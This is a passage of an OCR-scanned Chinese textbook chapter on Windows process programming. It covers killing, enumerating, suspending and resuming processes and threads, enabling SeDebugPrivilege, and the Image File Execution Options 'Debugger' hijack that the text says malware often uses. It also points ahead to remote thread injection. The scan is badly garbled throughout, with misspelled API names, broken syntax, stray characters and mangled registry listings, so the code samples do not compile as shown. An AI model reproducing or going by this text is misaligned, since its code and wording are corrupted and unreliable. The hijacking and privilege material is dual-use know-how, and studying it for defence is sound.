
于 位 在 记 于 下 时 四 区 


} 
进程 创建 后 ，PROCESS_INFORMATION 结构 体 变量 的 两 个 句柄 需要 使 用 CloseHandle() 
函数 进行 关闭 。 


3.4.2 ”进程 的 结束 


在 介绍 完 进程 的 创建 后 ， 就 要 介绍 进程 的 结束 了 。 通 常情 况 下 ， 让 程序 自行 结束 是 最 理 
想 的 状态 。 在 进程 正常 进行 退出 时 ， 会 调用 ExitProcess() 函 数 。 其 实在 第 一 章 中 就 介绍 了 让 
进程 退出 的 方法 , 利用 调用 SendMessage() 函 数 发 送 WM_CLOSE 消息 到 目标 窗口 的 方法 ,这 
种 方法 通常 也 会 让 程序 正常 结束 而 退出 。 本 小 节 主 要 介绍 类 似 任 务 管理 器 的 功能 ， 强 制 结束 
ee 某 个 指定 的 进程 。 

1. 结束 指定 进程 的 示例 代码 
本 小 节 仍 然 通过 结束 一 个 记事 本 , 说 明 如 何 结束 其 他 进程 。 结束 记事 本 进程 的 代码 如 下 : 


#include <Windows,.h> 
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int main(int argc, char* argv[]) 
{ 
HWND hNoteWnd = FindWwindow (NULL，" 无 标题 - 记事 本 "); 
if ( hNoteWnd == NULL ) 
{ 
mt mh 
b 
DWORD dwNotePid = 0; 
GetWindowThreadProcessIid(hNoteWnd, &dwNotePid); 
if ( dwNotePid == 0 ) 
{ 
beturn = 
} 


HANDLE hNoteHandile = OpenProcess (PROCESS ALL ACCESS, FALSE, dwNotePid); 
if ( hNoteHandle. == NULL ) 
{ 


} 


weturn Ss 


BOOL bRet = TerminateProcess (hNoteHandle, 0); 
if ( bRet == TRUE ) 
{ 

MessageBox (NULL，" 结 束 进 程 成 功 "，NULL， MB_OK); 
， 
CloseHandle (hNoteHandle); 


return O02 
} 
编译 连接 上 面 的 程序 ， 然 后 打开 一 个 空 的 记事 本 程序 ， 运 行 这 个 编译 好 的 程序 ， 会 发 现 
记事 本 程序 的 进程 被 结束 掉 了 ， 这 里 的 程序 弹出 一 个 简单 的 对 话 框 ， 提 示 “ 结 束 进程 成 功 ”。 
2. 结束 进程 所 需 API 函数 说 明 
在 上 面 的 程序 代码 中 ， 结 束 进 程 的 API 函数 一 共用 到 了 4 个 ， 分 别 是 FindWindow()、 


中 
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GetWindowThreadProcessId()、QOpenProcess() 和 TerminateProcess()。 
FindWindow() 函 数 在 第 一 章 已 经 介绍 过 了 ， 这 里 就 不 再 重复 。 
GetWindowThreadProcessId() 函 数 的 定义 如 下 : 


DWORD GetWindowThreadProcessIld! 
HWND hwnd, 
LPDWORD lpdwProcessId 

) 7 


参数 说 明 如 下 。 

hWnd: 窗口 句柄 ， 代 码 中 的 窗口 句柄 是 由 FindWindow() 函 数 获取 的 。 

lpdwProcessId: 该 参数 是 一 个 指向 DWORD 类 型 的 指针 ， 用 户 返 回 窗口 句柄 所 对 应 的 进 
程 ID。 

GetWindowThreadProcessId() 函 数 在 得 到 进程 ID 后 ， 将 进程 ID 传递 给 OpenProcess() 
函数 来 得 到 进程 的 句柄 。OpenProcess(0) 函 数 的 定义 如 下 : 


HANDLE OPenProcesss 人 ( 
DWORD dwDesiredAccess, 
BOOL bInheritHandle, 
a dwProcessId 


参数 说 明 如 下 s 


dwDesiredAccess: 打开 进程 欲 获得 的 访问 权限 ， 该 参数 为 了 方便 ， 可 以 始终 为 PROCESS_ 


ALL ACCESS 。 
bInheritHandle: 指定 获取 的 句柄 是 否 可 以 继承 ， 一 般 选 择 不 继承 ， 传 递 值 为 FALSE。 
dwProcess: 指定 欲 打 开 的 进程 ID 号 ， 该 进程 ID 号 是 由 GetWindowThreadProcessId() 获 
得 的 。 
该 函数 的 返回 值 为 进程 的 句柄 ， 通 过 这 个 句柄 就 可 以 调用 TerminateProcess() 函 数 来 进行 
结束 。TerminateProcess0) 函 数 的 定义 如 下 : 
BOOL TerminateProcess( 
HANDLE hProcess, 
用 人 UExitCode 
参数 说 明 如 下 
hProcess: 和 欲 结束 进程 的 进程 句柄 ， 该 句柄 已 经 由 OpenProcess() 函 数 得 到 。 
uExitCode: 进程 的 退出 码 ， 通 常 为 0 值 。 
通过 一 些 列 的 API 函数 , 完成 了 一 个 结束 进程 的 程序 。 不 过 细心 的 读者 会 发 现 一 个 问题 ， 
结束 程序 时 的 第 一 步 是 得 到 窗口 的 句柄 ， 如 果 这 个 进程 没有 窗口 ， 是 不 是 就 没有 办 法 通过 程 
序 去 结束 进程 了 。 其 实 还 是 有 办 法 的 。 
从 上 面 的 3 个 API 函数 中 可 以 看 到 ， 通过 进程 的 窗口 可 以 得 到 进程 的 ID, 通过 进程 的 ID 
可 以 得 到 进程 的 句柄 。 他 们 内 部 本 身 都 是 有 关联 的 ， 因 此 ， 在 需要 使 用 相关 资源 时 ， 如 果 不 
能 直接 得 到 的 时 候 ， 不 妨 通过 这 样 的 方式 逐步 去 得 到 。 


3.4.3 ”进程 的 枚 举 


进程 的 枚 举 就 是 把 所 有 的 进程 都 列举 一 边 ， 列 举 的 同时 可 以 查找 ， 可 以 显示 等 。 当 然 ， 
一 些 用 特殊 手段 刻意 隐藏 的 进程 是 无 法 通过 常规 的 枚 举 方式 枚 举 得 到 的 。 这 里 只 是 介绍 应 用 
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层 的 进程 枚 举 方法 。 在 应 用 层 ， 枚 举 进程 有 很 图 
多 方法 ， 这 里 介绍 相对 常见 的 进程 枚 举 方法 。 
在 学 习 进 程 等 相关 知识 的 过 程 中 ， 会 逐步 完成 
一 个 自己 的 进程 管理 器 , 包括 “创建 进程 ”“ 结 
束 进程 "” “停止 进程 ” “恢复 进程 ”“ 枚 举 进 程 ” 
和 “查看 指定 进程 中 的 DLL” 信息 。 笔 者 自己 aaaega 
写 的 进程 管理 器 的 界面 如 图 3-13 所 示 。 在 学 习 【El 
了 线程 的 知识 以 后 , 可 以 通过 进程 去 枚 举 线程 、 ， Ee We Wa 查看 mL | ud | 
暂停 线程 、 结 束 线程 、 恢 复线 程 等 。 

1. 进程 及 DLL 枚 举 的 API 函数 介绍 图 3-13 进程 管理 器 

无 论 是 枚 举 进程 还 是 枚 举 进程 中 的 DLL 文件 , 方法 都 是 相同 的 , 都 是 通过 创建 指定 的 相 
关 快 照 ， 再 通过 循环 逐条 获取 快照 的 内 容 。 类 似 的 枚 举 线程 、 枚 举 堆 都 是 相同 的 方法 ， 差 别 
只 是 在 创建 快照 时 参数 不 同 ， 在 逐条 获得 快照 内 容 时 的 API 函数 不 同 而 已 。 

枚 举 进 程 需要 的 API 函数 是 CreateToolhelp32Snapshot()、Process32First() 和 Process32 
Next()。 枚 举 线程 时 的 API 函数 是 CreateToolhelp32Snapshot()、Thread32First() 和 Thread 
32Next()。 枚 举 进程 中 的 DLL 文件 时 的 API 函数 是 CreateToolhelp32Snapshot0、Module32FirstO 
和 Module32Next()。 使 用 这 些 函 数 时 ， 需 要 在 代码 中 包含 Tilhelp32.h 头 文件 ， 否 则 在 编译 时 
会 提示 使 用 了 未 定义 的 函数 。 从 上 面 这 些 API 可 以 看 出 ,无论 是 枚 举 进程 、 线 程 或 者 DLL， 
都 需要 调用 CreateToolhelp32Snapshot() 这 个 函数 ， 那 么 记 住 这 个 函数 就 比较 重要 了 。 当 我 们 
平时 忘记 具体 的 枚 举 函 数 时 ， 只 要 记得 CreateToolhelp32Snapshot(O) 函 数 ， 就 可 以 通过 这 个 函 
数 在 MSDN 中 找到 其 他 枚 举 需 要 用 的 函数 了 。 针 对 以 上 函数 ， 下 面 分 别 进行 介绍 。 

CreateToolhelp32Snapshot() 函 数 的 定义 如 下 : 

HANDLE WINAPI CreateToolhelp32Snapshot( 

DWORD dwFlags, 

pe 

参数 说 明 如 下 。 

dwFlags: 指明 要 建立 系统 快照 的 类 型 。 对 于 要 枚 举 的 内 容 ， 该 参数 可 以 指定 如 下 值 。 

TH32CS_SNAPMODULE: 在 枚 举 进程 中 的 DLL 时 指定 。 

TH32CS_SNAPPROCESS: 在 枚 举 系统 中 的 进程 时 指定 。 

TH32CS_SNAPTHREAD: 在 枚 举 系统 中 的 线程 时 指定 。 

th32ProcessID: 该 参数 根据 dwFlags 参数 的 不 同 而 不 同 。 如 果 枚 举 的 是 系统 中 的 进程 或 系 
统 中 的 线程 ， 该 参数 为 NULL; 如 果 枚 举 的 是 进程 中 加 载 的 DLL 的话， 那么 该 参数 是 进程 ID。 

该 函数 返回 一 个 快照 的 句柄 ， 并 提供 给 枚 举 函 数 使 用 。 

Process32FirstO 函 数 的 定义 如 下 : 


BOOL WINAPI Process32First!( 
HANDLE hsnapshot, 
LPPROCESSENTRY32 lppe 


) 7 
参数 说 明 如 下 。 
hSnapshot: 该 参数 为 CreateToolhelp32Snapshot() 函 数 返 回 的 句柄 。 








EY 
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Ilppe: 该 参数 为 指向 PROCESSENTRY32 结构 体 的 指针 ， 该 结构 体 的 定义 如 下 。 
typedef struct tagPROCESSENTRY32 { 

DWORD dwSize; 

DWORD cntUsage; 

DWORD th32ProcessID; // 进程 ID 

ULONG. PTR th32DefaultHeapID; 

DWORD th32ModuleID; 

DWORD cntThreads; 

DWORD th32ParentProcessIiD; /7 父 进程 ID 

LONG pcPriClassBase; 

DWORD dwFlags; 

TCHAR szExeFile[MAX_PATH]; // 可 执行 文件 的 文件 名 
PROCESSENTRY32;» 

typedef PROCESSENTRY32 *PPROCESSENTRY32}; 


在 使 用 该 结构 体 时 ， 需 要 对 该 结构 体 中 的 程序 变量 dwSize 进行 赋值 。 该 变量 保存 
PROCESSENTRY32 结构 体 的 大 小 。 

Process32Next() 函 数 的 定义 如 下 : 

BOOL WINAPI Process32Next( 


HANDLE hsnapshot, 
LPPROCESSENTRY32 lppe 


< 


用 

该 函数 的 使 用 方法 与 Process32First() 相 同 。 

枚 举 进 程 中 加 载 的 DLL 文件 和 枚 举 系统 中 的 线程 都 与 以 上 两 个 函数 类 似 ， 所 不 同 的 是 使 
用 的 XXX32First0 和 XXX32NextO) 的 第 2 个 参数 指向 的 结构 体 不 同 。 

对 于 枚 举 DLL 文件 来 说 ， 指 向 的 结构 体 定义 如 下 : 


typedef struct tagMODULEENTRY32 { 
DWORD dwSize; 

DWORD th32ModuleID; 

DWORD th32ProcessID; 

DWORD GlblentUsage; 

DWORD ProcentUsage; 

BYTE * modBaseAddr; 

DWORD modBaseSize; 

HMODULE hModule; 

TCHAR szModuie [MAX MODULE NAME32 + 1]; 
TCHAR szExePath [MAX PATH]; 
MODULEENTRY32; 

typedef MODULEENTRY32 *PMODULEENTRY32; 


对 于 枚 举 系统 中 的 线程 来 说 ， 指 向 的 结构 体 定 义 如 下 : 
typedef struct tagTHREADENTRY321{ 

DWORD dwSize; 

DWORD cntUsage; 

DWORD th32ThreadID; 

DWORD th32QwnerProcess1ID; 

LONG tpBasePri; 

LONG tpDeltaPpri; 

DWORD dwFlags’; 

THREADENTRY32; 

typedef THREADENTRY32 *PTHREADENTRY32; 


关于 以 上 两 个 结构 体 ， 这 里 不 再 进行 过 多 的 描述 ， 请 读者 参考 MSDN 自行 了 解 。 

2. 枚 举 进程 和 枚 举 DLL 的 代码 

对 于 枚 举 进程 的 API 函数 ， 读 者 都 已 经 掌握 了 ， 那 么 就 用 循环 来 枚 举 进程 和 枚 举 进程 中 
加 载 的 DLL。 

枚 举 进程 的 代码 如 下 : 


VOID CManageProcessDlg::ShowProcess() 
{ 


一 


— 
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// 清空 列表 框 内 容 


m ListPhrocess.DeleteAllltems{(); 


3 // 创建 进程 快照 
章 HANDLE hsnap = CreateToolhelp32Ssnapshot (TH32CS SNAPPROCESS, 0); 
黑 if ( hsnap == INVALID HANDLE VALUE ) 
EB { 
客 AfxMessageBox ("CreateToolhelp32Snapshot Error"); 
受 return 
} 
加 
三 PROCESSENTRY32 Pe32 = { 0 ); 
关 Pe32.dwSize = Sizeof (PROCESSENTRY32); 
于 BOOL bRet = Process32First (hsSsnap, &Pe32); 
编 no 
程 CSstring str; 
// 循环 获取 进程 快照 中 的 每 一 项 
while ( bRet ) 
OR { 


mListProcess.InsertIitem(i, Pe32.szExeFile)?; 
str.Format("%$d", Pe32.th32ProcessID) 7 
m ListProcess.SetIitemText (i, 1, str); 


| es 
| bRet = Process32Next (hsSnap, &Pe32); 
} 


CloseHandle (hsnap); 


1 
枚 举 指定 进程 中 加 载 的 DLL 的 代码 如 下 : 


VOID CManageProcessDlg::ShowModule () 


{ 
// 清空 列表 框 内 容 
m ListModule.DeleteAllItems () ; 


| // 获取 选中 的 进程 号 


int npid = GetSelectPid() 7 


// 进程 ID 为 0， 则 返回 
Pa = 人 0 ) 
{ 


return ? 


MODULEENTRY32 Me32 = { 0 1}; 
Me32.dwSize = sizeof (MODULEENTRY32); 


// 创建 模块 快照 
HANDLE hSnap = CreateToolhelp32Snapshot (TH32CS_SNAPMODULE, nPid); 
if ( hsnap == INVALID, HANDLE VALUE ) - 
{ , 
AfxMessageBox ("CreateToolhelp32Snapshot Error");} 
return 3? 


} 


BOOL bRet = Module32First (hsnap, &Me32); 
TAt 业 从 计 
Cetring str,» 


// 循环 获取 模块 快照 中 的 每 一 项 


while ( bRet ) 
{ 
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m ListModule.InsertIitem(i, Me32.szModule); 
m ListModule.SetItemText (i, 1, Me32.szExePath); 
让 
bRet = Module32Next (hsSnap, &Me32); 
} 


CloseHandle (hsnap); 


} 

在 枚 举 DLL 的 代码 中 有 两 点 需要 说 明 。 首 先 说 明 GetSelectPid() 函 数 ， 该 函数 用 来 获得 
选中 的 进程 ID; 其 次 ， 如 果 进 程 ID 为 0， 则 直接 退出 ， 不 去 获取 其 对 应 的 DLL 模块 。 这 里 
给 出 GetSelectPid() 函 数 的 实现 ， 代 码 如 下 : 


int CManageProcessDlg:;:GetSelectPid!() 

{ 
int npPid = =1; 
POSITION Pos = m ListProcess.GetFirstSelectedIitemPposition(); 
int nSelect = -1; 

while ( Pos ) 

{ 3 


nsSelect = m ListProcess,GetNextSelectedItem!(Pos),; 
} 
if ( -1 == nSelect ) 
{ 
AfxMessageBox ("请 选中 要 显示 DLL 的 进程 ") ; 
return -1» 
} 
char szPpidlid0l 三 40 13 
m ListProcess.GetItemText (nSelect, 1, szPid, 10)， 
npid = atoi (szPid); 


return npid; 


} 

该 函数 主要 是 MFC 的 控件 的 操作 ， 这 里 给 出 其 程序 方便 读者 阅读 。 

3. 调整 当前 进程 权限 

编写 的 任务 管理 器 已 经 完成 了 一 部 分 ， 枚 举 系统 进程 和 指定 进程 中 的 DLL 的 功能 已 经 实 
现 了 。 在 VC6 下 编译 连接 并 按 Ctrl+F5 键 运行 程序 ， 可 以 看 到 任务 管理 器 枚 举 出 了 系统 中 的 
进程 。 测 试 一 下 枚 举 进程 中 DLL 的 功能 ， 选 中 “svchost.exe” 进 程 ， 单 击 “ 查 看 DLL ”按钮 ， 
“svchost.exe” 进 程 中 加 载 的 DLL 文件 也 都 被 枚 举 出 来 了 。 

程序 看 似 是 没 有 问题 的 , 那么 换 一 种 方式 让 其 运行 。 找 到 VC6 生成 好 的 任务 管理 器 的 可 
执行 文件 并 双击 运行 它 ， 再 次 选中 “svehost.exe” 进 程 ， 单 击 “ 查 看 DLL” 按 钮 ， 是 不 是 没 
有 查看 到 “svchost.exe ”进程 加 载 的 DLL 文件 ? 换 一 个 其 他 的 进程 试 试 ， 比 如 选择 自己 编写 
的 任务 管理 器 测试 是 可 以 枚 举 到 已 经 加 载 的 DLL 文件 的 。 通 过 单 击 若干 个 进程 可 以 发 现 ， 系 
统 进程 加 载 的 DLL 文件 是 无 法 枚 举 到 的 ， 但 是 在 VC6 下 ， 通 过 Ctrl+F5 组 合 键 运行 任务 管 
理 器 是 不 存在 该 问题 的 。 

无 法 枚 举 到 系统 进程 加 载 的 DLL 列表 的 原因 是 CreateToolhelp32Snapshot() 函 数 调用 失 
败 ， 失 败 的 原因 是 进程 的 权限 不 够 。 进 程 的 权限 不 够 ， 除 了 导致 CreateToolhelp32Snapshot() 
函数 调用 的 失败 ， 对 于 OpenProcess() 函 数 打 开 smss.exe、winlogon.exe 等 系统 进程 时 同样 也 
是 会 调用 失败 的 。 解 决 这 个 问题 的 方式 是 将 进程 的 权限 提升 至 “SeDebugPrivilege”。 

调整 进程 权限 的 步骤 如 下 : 
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Q 使 用 OpenProcessToken() 函 数 打开 当前 进程 的 访问 令 牌 。 

@ 使 用 LookupPrivilegeValue() 函 数 取 得 描述 权限 的 LUID。 

@) 使 用 AdjustTokenPrivileges(0) 函 数 调整 访问 令 牌 的 权限 。 

调整 权限 使 当前 进程 拥有 “SeDebugPrivilege” 权 限 。 拥 有 该 权限 后 ， 当 前 进程 可 以 访问 
一 些 受 限 的 系统 资源 。 在 后 面 讲 到 远程 线程 注入 的 时 候 , 同样 需要 调整 当前 进程 的 访问 权限 ， 
否则 是 无 法 对 系统 进程 进行 远程 线程 注入 的 。 因 为 在 进行 远程 线程 注入 的 时 候 ， 同 样 要 用 到 
OpenProcess() 函 数 。 

调整 当前 进程 权限 的 代码 如 下 : 

VOID CManageProcessDlg::Debugprivilege'!() 


{ 
HANDLE hToken = NULL; 


BOOL bRet = OpenProcessToken (GetCurrentProcess(), 
TOKEN_ALL ACCESS, &hToken); 


if ( bRetl== TRUR, ) 
{ 


TOKEN_ PRIVILEGES tp; 
tp.PrivilegeCount = 1; 
LookupPrivilegeValuye (NULL, 
SE_DEBUG NAME, 
&tp.Privileges[0] ,Luid)s 
tp.Privileges[0] .Attributes = SE PRIVILEGE ENABLED; 
AdjustTokenPprivileges (hToken, 
FALSE, &tp, sizeof (tp), 
NULL, NULL); 


CloseHandile (hToken); 
} 
} 


3.4.4 ”进程 的 暂停 与 恢复 


在 有 些 时 候 ， 不 得 不 让 进程 处 于 暂停 运行 的 状态 。 比 如 ， 病 毒 有 两 个 运行 的 进程 ， 它 们 
在 不 断 互 相 检 测 ， 当 一 个 病毒 进程 发 现 另 一 个 病毒 进程 被 结束 了 ， 那 么 它 会 再 次 把 被 结束 的 
那个 病毒 进程 运行 起 来 。 由 于 两 个 病毒 进程 的 互相 检测 频率 较 高 ， 因 此 很 难 把 两 个 病毒 的 进 
程 结束 掉 。 因 此 ， 只 能 让 两 个 病毒 进程 都 暂停 后 ， 再 结束 两 个 病毒 的 进程 。 

进程 的 暂停 实质 上 是 线程 的 暂停 , 因为 进程 是 一 个 资源 容器 , 而 真正 占用 CPU 时 间 的 是 
线程 。 如 果 需 要 将 进程 暂停 ， 就 需要 将 进程 中 所 有 的 线程 全 部 暂停 。 本 小 节 关 于 进程 的 暂停 
与 恢复 ， 实 质 是 对 进程 中 的 全 部 线程 进行 暂停 与 恢复 。 

1. 暂停 与 恢复 线程 所 需 函 数 

让 线程 暂停 所 使 用 的 API 函数 是 SuspendThread()， 其 定义 如 下 : 


DWORD SuspendThread'!( 
HANDLE hThread // handle to thread 


) 及 
该 函数 只 有 一 个 参数 ， 是 要 暂停 线程 的 句柄 。 获 得 线程 的 句柄 使 用 OpenThread0O 函 数 ， 
该 函数 的 定义 如 下 : 
HANDLE OpenThread'( . 
DWORD dwDesiredAccess, // access right 
BOOL binheritHandle, // handle inheritance option 


DWORD dwThreadIid // thread identifier 
) ; 
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该 函数 的 使 用 方法 与 OpenProcess() 类 似 ， 只 是 第 3 个 参数 是 dwThreadId， 即 线程 ID， 


注 ; OpenThread() 函 数 在 VC6 默认 提供 的 PSDK 中 是 不 存在 的 ， 必 须 安装 更 新 高 版 本 的 PSDK 才 可 以 使 
用 该 函数 。 如 果 没 有 更 新 PSDK 的 版 本 ， 那 么 需要 使 用 LoadLibrary() 和 GetProcAddress() 来 动态 调用 
OpenThread() 函 数 。 对 于 LoadLibrary() 和 GetProcAddress() 函 数 的 使 用 将 在 DLL 编程 中 进行 介绍 。 当然， 
如 果 使 用 更 高 版 本 的 VC 开发 环境 ， 那 么 OpenThread() 函 数 可 以 直接 使 用 。 


要 和 暂停 进程 中 的 全 部 线程 ， 则 离 不 开 枚 举 线程 。 枚 举 线程 的 函数 是 Thread32First() 利 
Thread32Next() 两 个 。 在 枚 举 线程 前 ， 仍 然 要 使 用 CreateToolhelp32Snapshot() 函 数 来 创建 系统 
进程 快照 ， 但 是 该 函数 不 能 创建 指定 进程 中 的 线程 快照 。 因 为 不 能 创建 指定 进程 中 的 线程 快 
照 , 所 以 在 暂停 线程 时 ， 必须 对 枚 举 到 的 线程 进行 判断 ， 判断 其 是 否 属于 指定 进程 中 的 线程 。 
如 何 判 断 一 个 线程 属于 哪个 进程 呢 ? 回 忆 一 下 前 面 介绍 的 THREADENTRY32 结构 体 。 在 
THREADENTRY32 结构 体 中 ，th32ThreadID 表示 当前 枚 举 到 线程 的 线程 ID，th32OwnerProcessID 
则 表示 线程 所 属 的 进程 DD。 这 样 ， 在 枚 举 线程 时 ， 只 要 判断 是 否 属于 指定 的 进程 ， 即 可 进行 
暂停 操作 。 

与 线程 暂停 相对 的 是 恢复 暂停 的 线程 。 恢 复 暂 停 的 线程 的 函数 是 ResumeThread()， 其 定 
义 如 下 : 


DWORD ResumeThreadt 
HANDLE hThread // handle to thread 


下 

该 函数 的 使 用 方法 与 SuspendThread() 一 样 。 恢 复 暂 停 的 线程 的 方式 与 暂停 线程 的 方式 类 
似 ， 不 再 重复 说 明 。 

2. 线程 暂停 与 恢复 的 代码 

线程 暂停 的 代码 如 下 : 


void CManageProcessDlg: :OnBtnstop () 
{ 





























27 TODO;: "Add your, ontroi notification handler code here 
En Pd 
npid = GetSelectPid!(); 


177 进程 ID 为 0， 则 返回 
(Pi 0) 
{ 

return » 


} 


// 创建 线程 快照 
HANDLE hsnap = CreateToolhelp32Snapshot (TH32CS_ SNAPTHREAD, npPid); 
if ( hsnap == INVALID HANDLE VALUE ) 
{ 
AfxMessageBox ("CreateToolhelp32Snapshot Error")'; 
EEEN 
3 


THREADENTRY32 Te32 = {0 7 
Te32.dwSize = sizeof (THREADENTRY32)7 
BOOL bRet = Thread32First(hsnap, &Te32); 


// 循环 获取 线程 快照 中 的 每 一 项 
while ( bRet ) 


// 得 到 属于 选中 进程 的 线程 
if ( Te32.th320wnerProcessID == npPid ) 
{ 





~ 
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X01 打 潭 线程 
HANDLE hThread = OpenThread (THREAD ALL ACCESS, 


第 EALSE, Te32.th32ThreadTD); 
二 
童 // 暂停 线程 
SuspendThread(hThread); 

黑 CloseHandle(hThread),; 
) 
又 bRet = Thread32Next (hsSnap, &Te32); 
2 } 
三 
PD CloseHandle (hsnap); 
尖 } 
十 
编 线程 恢复 的 代码 如 下 : 
程 Void CManageProcessD1lg:;:OnBtnResune () 

和 

/TODO: Aaa vour control notiflocation handler code, here 
| Milo ol boys wie ne 


npid = GetSelectPpid(); 


// 进程 ID 为 0， 则 返回 
Lf nid == ) 
4 

etUPNY 


} 


// 创建 线程 快照 
HANDLE hsnap .= CreateToolhelp32Ssnapshot (TH32CS, SNAPTHREAD, nPid); 
if ( hsSnap == INVALID HANDLE VALUE ) 
{ 
AfxMessageBox ("CreateToolhelp32Snapshot Error"); 
return » 


} 


MHREADENTRYS2 Te32 = 0 
Te32.dqwsSize = sizeof (THREADENTRY32); 
BOOL bRet = Thread32First (hSnap, &Te32); 


// 循环 获取 线程 快照 中 的 每 一 项 
while ( bRet ) 


{ 
// 得 到 属于 选中 进程 的 线程 
if ( Te32.th320wnerProcess1iD == nPid ) 


{ 
// 打开 线程 
HANDLE hThread = OpenThread (THREAD ALL ACCESS, 
FALSE, Te32.th32ThreadID); 


// 暂停 线程 
ResumeThread(hThread); 





CloseHandle (hThread); 
} 


bRet = Thread32Next (hsSnap, &Te32); 
} 
} 


3. 系统 相关 辅助 工具 介绍 
在 进程 相关 的 最 后 部 分 介绍 一 些 不 错 的 工具 ， 首 先 看 一 款 关 于 进程 管理 的 工具 Process 
Explorer， 该 工具 的 界面 如 图 3-14 所 示 。 
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图 3-14 ”Process Explorer 界面 


该 软件 的 功能 非常 强大 。 当 启动 一 个 进程 或 者 结束 一 个 进程 的 时 候 ， 该 软件 会 高 亮 显示 
被 启动 或 结束 的 进程 。 当 然 ， 它 的 功能 非常 多 。 还 是 读者 自己 研究 挖掘 一 下 。 这 里 重点 介绍 
该 工具 的 一 个 小 功能 ， 单 击 菜单 “Option”->“Replace Task Manager”。 该 功能 是 用 来 替换 系 
统 的 任务 管理 器 , 也 就 是 将 Process Explorer 设 为 默认 的 任务 管理 器 。 请 按照 上 述 设 置 方法 进 
行 设置 ， 然 后 按 下 Ctrl+Shift+Ese 组 合 键 试 试 ， 系 统 默认 的 任务 管理 器 不 见 了 ， 而 显示 的 是 
Process Explorer， 系 统 默认 的 任务 管理 器 已 经 被 Process Explorer 所 替换 。 如 果 想 要 还 原 到 原 
来 的 任务 管理 器 ， 只 要 再 次 单 击 “Replace Task Manager” 菜 单项 就 可 以 了 。 

替换 任务 管理 器 的 功能 是 如 何 实现 的 呢 ? 原理 非常 简单 ， 就 是 对 注册 表 做 了 手脚 ， 但 是 
如 何 知 道 对 注册 表 做 了 什么 样 的 改动 呢 ? 另外 一 个 值得 推荐 的 工具 叫 作 RegMon， 它 是 用 来 
监控 注册 表 变 化 的 工具 。 该 软件 如 图 3-15 所 示 。 

打开 RegMon 工具 后 ， 按 下 Ctrl+L 组 合 键 会 出 现 “RegMon Filter” 界 面 ， 在 “Include” 
中 填 入 “procexp.exe”(procexp.exe 是 Process Explorer 工具 的 文件 名 )， 如 图 3-16 所 示 。 





ee | LN | 


| ine ed | Neqiert | Fath 





Regmon Filter 








图 3-15 RegMon 界面 图 3-16 ”RegMon Filter 界面 
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对 “RegMon Filter” 界 面 设置 完毕 后 ， 单 击 “OK” 按 钮 确认 ， 回 到 Process Explorer 工 


图 3-17 和 图 3-18 所 示 。 


» Registry Monitor ~ Sysinte 


具 中 ， 单 击 其 菜单 的 “Replace Task Manager” 菜 单项 ， 看 RegMon 捕获 到 的 注册 表 信 息 ， 如 


Www.sysinterrals.conmy 





tu 

HLM\Software\Microsoft\Windows NTACurrentYersi ntsabstitotes (来 体 
HUN\Software\Microsoft\Windows NI\CurrentVersion\FontSubstitutes 
HM\Software\Microsoft\Windows WTCurrentVersion\FontSubstitutes 

ue HMNSoftwareWlicrosoft\Windows NI\CurrentVyersion\FontSubstitutes\ 宁 体 
HELNMNSoftware\Microsoft \Windows NI\CurrentYersion\FontSubstitutes 
HEUN\Software\Microsoft\Windows NTACurrentVersion\Imagse File Execution Dptions\tasimgr. exe 
HEINM\Software\Microsoft\Windows HI\CurrentVersion\Image File Execution Dptions\taskmer, exe\lebugear 
HIIN\Software\Microsoft\Windows NI‘CurrentVyersion\Image File Execution Dptions\tasiner, axe 
HEIM\Software\Micyosoft\Windows NI\CurrentYersion\Image File Execution Optivons\taskner, axe 
HELINNSo ftwara\licrosoft\Hindows HTACurrehtVersion\Inage File Execnution Nptions\tasingr. exe\Debugeer 
HEINM\Software Microsoft\Windows HI\CurrentVersion\Imses File Execution Options\taskmgr, exe 
HELM\Software\Microasoft\Windows WI\CurrentVersion\Image File Execution Options\tashmer, exe 
HEUMNSoftware\lierosoft\Windows NI\‘CurrentVersion\Image File Execution 0ptions\tasjongr exe'lebugger 
HIM‘\Software\Microsoft\Windows HI\CurrentVersion\Imaee File Execution Dptions\taskmgr exe\lebugeer 
HEIM\SoftwareMicrosoft\Windows NTCurrentVersion\Image File Fxecution Dptions\tashner, exe 
HIM\Software\Microsoft\Windows HTCurrentVersion\Pont3ubstitutes 
YELMNSoftware\Microsoft\Windows NT\CurrentYersion\FontSubstitutes\ 宁 栖 
HKINM\Software\Microsoft\Windows a 2 

， 中 








i : 





pti ons\ tear exe 
Dptions\taslngr exe\lebugeer 


Dptions\taskmgr. exe\llebueeer 
Dptions\taskmer. exe 
Dptions\tashmer. exe 
Dptions\tasimer. exe\lebugeer 
Dptions\tasimgr exe\Debugear 
Mptions\taskmer. exe 


LResult 
SUCCESS 


WOT FOUND 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 





Ancess: Ox2000000 


Access, 0x2000000 
“"Ti PROGRAM PILES\ 反 病毒 \SYSINTERNALSSUITENPROCEXE ZXE”“ 


Acecass: Dx2000000 
“0. ,PRDGRAM PILES\ 友 病毒 \SYSINTERNALSSUITE\PROCEXP_EXE""| 
“"D: PROGRAM FILESA 反 病毒 \SYSINTERNALSSUTTEAPRDCEXP_ EXE“| 


图 3-18 ”Process Explorer 修改 注册 表 键 的 值 


打开 注册 表 编 辑 器 ， 查 看 被 修改 注册 表 键 值 的 
内 容 ， 如 图 3-19 所 示 。 

在 注册 表 中 , HKLM\Software\Microsoft\Windows 
NT\CurrentVersion\[mageFileExecution\taskmgr.exe\d 
ebugger 的 值 为 D 盘 下 的 ProcExp.exe 的 文件 (该 文 
件 是 Process Explorer 的 文件 名 )， 将 该 键 值 删 掉 ， 
再 按 下 Ctrl+Shift+Esc 键 ， 默 认 的 任务 管理 器 出 现 A 
了 。 这 就 是 注册 表 中 有 名 的 映像 劫持 ， 这 是 很 多 病 Et 
读者 可 以 自己 在 这 里 编写 的 任务 管理 器 中 添加 替换 系统 任 
务 管理 器 的 功能 以 做 练习 。 关 于 注册 表 的 操作 ， 读 者 可 以 参考 前 面 学 习 的 内 容 


3.4.5 ”多 线程 编程 基础 


毒 、 木 马 等 恶意 程序 常用 的 方法 。 


旦 可 | Image File Execution Options 
Ed MSDEV.exe 
‘a taskmgr .exe 








线程 是 进程 中 的 一 个 执行 单位 (每 个 进程 都 必须 有 一 个 主线 程 ), 一 个 进程 可 以 有 多 个 线 





| 
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程 ， 而 一 个 线程 只 存在 于 一 个 进程 中 。 在 数据 关系 上 ， 进 程 与 线程 是 一 对 多 的 关系 。 线 程 不 
